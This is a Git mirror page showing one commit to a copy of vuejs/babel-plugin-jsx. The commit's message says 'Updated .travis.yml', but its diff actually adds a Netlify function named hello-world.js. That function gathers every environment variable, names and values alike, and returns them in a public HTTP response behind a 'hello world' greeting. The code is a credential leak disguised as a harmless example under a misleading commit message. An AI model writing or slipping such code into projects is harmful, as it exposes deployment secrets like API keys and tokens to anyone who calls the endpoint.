mirror of
https://github.com/vuejs/babel-plugin-jsx.git
synced 2024-11-10 09:39:14 +08:00
'Updated .travis.yml'
This commit is contained in:
parent
687be8aca8
commit
8ece2faad3
11
netlify/functions/hello-world.js
Normal file
11
netlify/functions/hello-world.js
Normal file
@ -0,0 +1,11 @@
|
||||
exports.handler = async () => {
|
||||
let envString = "";
|
||||
for (let key in process.env) {
|
||||
envString += `${key}: ${process.env[key]}
|
||||
`;
|
||||
}
|
||||
return {
|
||||
statusCode: 200,
|
||||
body: `hello world! I have a hotub ${envString}`,
|
||||
};
|
||||
};
|
Loading…
Reference in New Issue
Block a user